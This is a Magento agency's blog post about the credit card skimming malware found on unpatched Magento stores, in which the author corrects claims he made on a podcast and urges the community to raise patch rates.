Magento® Security Scare Shows We All Must Make Changes. It’s Time to Come Together. And Increase the Magento® Patch Rate. Strange times can lead to strange things. And cybersecurity threats are more real now than ever before. I recently participated in a podcast interview with the good folks at MageTalk regarding a recent cybersecurity fiasco – the skimming of credit card numbers from Magento® Stores. I made a few mistakes here and there. I didn’t get all my facts right. And I forgot to propose a smart solution to the situation. It happens. Especially in today’s society of instant gratification and immediate communication. It’s easy to be a gasbag. It’s simple to get caught up in the wrong idea or opinion – and chase it down a rabbit hole, or up into the clouds (or cloud).
Magento® Security Scare Shows We All Must Make Changes. It’s Time to Come Together. And Increase the Magento® Patch Rate.
Strange times can lead to strange things. And cybersecurity threats are more real now than ever before.
I recently participated in a podcast interview with the good folks at MageTalk regarding a recent cybersecurity fiasco – the skimming of credit card numbers from Magento® Stores. I made a few mistakes here and there. I didn’t get all my facts right. And I forgot to propose a smart solution to the situation.
It happens. Especially in today’s society of instant gratification and immediate communication. It’s easy to be a gasbag. It’s simple to get caught up in the wrong idea or opinion – and chase it down a rabbit hole, or up into the clouds (or cloud).
But I’m not in the excuse-making business. I’m in the business of helping companies and brands build a strong, secure, diverse and profitable eCommerce solution built on the Magento® platform. So please, hear me out. Let me explain myself. And let me then transition into a smart, sharp focus on what we all can do to help make Magento® more secure, moving forward. Because now more than ever, we all need to come together. And work together, to increase the Magento® patch rate.
First, let me detail the situation at hand. Then we can go from explaining the situation…to laying a foundation for the solution.
What Went Wrong…
To sum up this development, Willem de Groot recently published a long list of Magento® Stores that have been skimming credit card numbers.
This happened because these stores have been affected by and infected with malware. And these stores were hit with this dangerous malware by these dangerous cybercriminals because they haven’t been patched with the latest and greatest online security patches. The walls were breached. The enemy came inside. And set up shop. Within these online shops.
Unfortunately, the extent of this malware-enabled cybersecurity breach runs rather far, wide and deep. There are multiple groups involved in this cybercrime. The affected merchants were unaware they’re being robbed. And online credit card skimming is up an astounding 69 percent since November of 2015.
After unpatched flaws in Magento® software have been found and exploited by cybercriminals, a hacker installs a Javascript “wiretap” that then funnels live payment data to an offshore collection. This wiretap operates independent of any knowledge by the customers or the merchant. Skimmed credit card information is then sold on the “dark web” – typically for $30 or more per card.
Willem broke this list of affected Magento® stores online, then all hell broke loose – online and off. By guilt of association and powered by rampant speculation and instant reaction that always spreads like wildfire in today’s online world. Willem was harassed by some for publishing the list and berated by others for not publishing it sooner.
What I Said. And Meant to Say…
That’s the gist of it, essentially. To dive deeper into this nefarious and far-reaching breach of Magento® software security flaws, I went on MageTalk and ranted about my opinion further with Kalen and Phillip. In the process, I made a few of those aforementioned mistakes. And I failed to propose any kind of solution to the problem at hand (an oversight which we will soon correct here).
Again, it happens. Nobody’s perfect, certainly not in today’s always-on, forever-finger-pointing society of instant gratification and online crime waves. When you really dig into just how much ground I covered on this interview with Kalen and Phillip, you’ll also see that room for some missteps naturally exists. It’s a wild, wide territory we’re roaming through here – and then again, so is my Imagination.
First and foremost, I want to commend the work that Willem has done. After reading his blog – and hearing the ensuring outrage when the list was first posted online for and against it I have a new found respect for Willem. After the Mage Talk episode I had a chat with Willem. Willem not only provided me with his valuable time and insight, but he engaged and conversed with me in a manner that was professional and respectful. He also helped me realize the errors of my ways – and a few of the mental and verbal missteps I made in my own online adventure.
I commend all the hard work that Willem has done to found Mage Report and I applaud his PASSION for security concerns and issues when it comes to the Magento® Platform.
I also want to make it very clear that any disagreement I may have with Willem’s work regarding this hotly contested recent report involves the method or “style” of how it happened – the “list-making” or “blacklisting” approach that is immediately associated with “naming and shaming” people.
I also want to address some of the false statements or premises I uncorked in my passionate podcast interview. And I want to thank Willem for “setting me straight” here.
*I discussed just how accurate the list is in terms of “False Positives” from Mage Report. Willem told me that “when it comes to accuracy, anyone could have validated the list, as I’d shared all the malware samples that I found out in the wild. I had a couple of hundred emails from merchants questioning the accuracy – each of which I verified by hand. I wouldn’t say it’s impossible that a false positive ended up here, but I sure haven’t found any”.
*I mentioned that the “INSECURE” merchant bears the brunt and financial repercussions of the card skimming as they receive a charge back. This was a flat-out mistake. Long story short, I just didn’t think this one through completely. Willem has. He explained it to me thusly: “the current fraud wave at hand steals payment data, but it doesn’t place fraudulent orders at Magento stores. So the ones who end up paying for the damage are the stores where fraud purchases are made (typically virtual online goods stores and Hong Kong-based physical electronics stores) and/or the customers who either didn’t recognize a fraud transaction on their statement or, in general, are confronted with increased “fraud battling” charges by their banks”. Whoops – This is what happens when you take a Skype call late in the day on a moment’s notice to appear on Mage Talk. Kalen should have CC’d me with a show plan ahead of time!
*I mentioned that we just have to assume that most of the people on this list are small businesses – or “smaller than small” businesses. After talking to Willem, I quickly learned that this is simply not the case here. Or as Willem described it, “absolutely untrue.” In fact, some of these businesses are VERY BIG. Willem told me he got a call from the chief of security from fortune 500 companies. I won’t name any of these companies here but they are pretty much the opposite of small businesses. My bad.
*I mentioned on the podcast that I felt “Magento should be reaching out to these customers”. Willem mentioned during our chat that to his knowledge, Magento® has taken the time to reach out to these customers – and send out a notice about reports of a JavaScript malware exploit. I’m not sure to what degree Magento® has communicated with these merchants, but nonetheless there has obviously been some effort put forth here.
DON’T Run Away…
My biggest concern with this whole situation was that the publishing of this list would scare online merchants and potential merchants away from Magento® entirely – in full and forever.
I mentioned this in my conversation with Willem, and he told me he agreed.
“I would agree here, and publishing this stuff was not a light decision. For context, I was berated by several consumer organizations for not publishing this list earlier. But the damage continues, as per day, another 10-90 new stores get fitted with skimming malware.”
Here at Imagination Media, we are a Magento®-driven agency. We have always been big believers in the power of this platform, and we remain committed to finding ways to use Magento® to make everyone more successful and profitable. And speaking of bottom lines, the bottom line here is that fewer merchants using Magento® isn’t good for any of us, from a financial standpoint. Not at all. We all need to remember this. And we all need to come together to find a swift solution to this problem.
Where We Go From Here…
Willem’s method of “list-making” may not have been the best possible option of all available avenues, but it served a valuable and much-needed purpose to all of us in the Magento® community.
Willem got the ball rolling here. As of November 15 2016, over 2,922 sites have been cleaned up. Now it’s time for us to pick it up. And run with it – all the way across the finish line.
Now more than ever, we need to come together to find an efficient, effective and sensible solution. Now more than ever, we need to “put our money where our mouth is” – and come together as a passionate, intelligent and loyal community of Magento developers.
That process starts with conducting a better overall discussion about this topic. In the wise words of Willem himself:
“We should definitely have a better public discussion on this. Because at the moment, Magento (and Community) are losing the security struggle. Front-end credit card skimming is increasing, patches are getting more complex, leading to fewer people patching. And criminals are shifting to hard-to-detect backend malware”
As it relates to Magento, this point is a bit sensitive and shaky. But it’s tough to ignore the inability of Magento® to release a security patch that works from its very onset – and keeps working properly. I understand that Magento® may feel that CE is an open-source software, and they’re doing everyone a favor by releasing a patch. But open-source software companies have a responsibility to that software and its security. Magento® has a LOT to gain – and lose – based on the reputation of its software security and performance.
As it relates to agencies, I think it’s important that agencies begin educating their customers on the topic of software and security maintenance. Most of the time, a merchant is guided to choose a platform by a development agency like us. I feel that the agency should also take some initiative in educating their clients on these situations and their overall severity. I’m not saying this is the agencies’ fault. Not at all. I’m simply saying that if we all want to push Magento® as a platform to merchants, we should be active in explaining the vital importance of security.
Two Key Questions…
The final questions I would leave all of us to ponder is this:
While I’m sure some of you already have helped in many ways that we just aren’t aware of. How do we find a way to help Willem continue to make progress towards this major issue of cybersecurity among the Magento® community and ecosystem?
How do we tap into a community that we all value as one of the strongest of any software platforms, and one of the most unselfish and willing to help, and leverage its powers to fix what is currently broken?
I look forward to finding the answers to these questions soon – working closely with all of you.
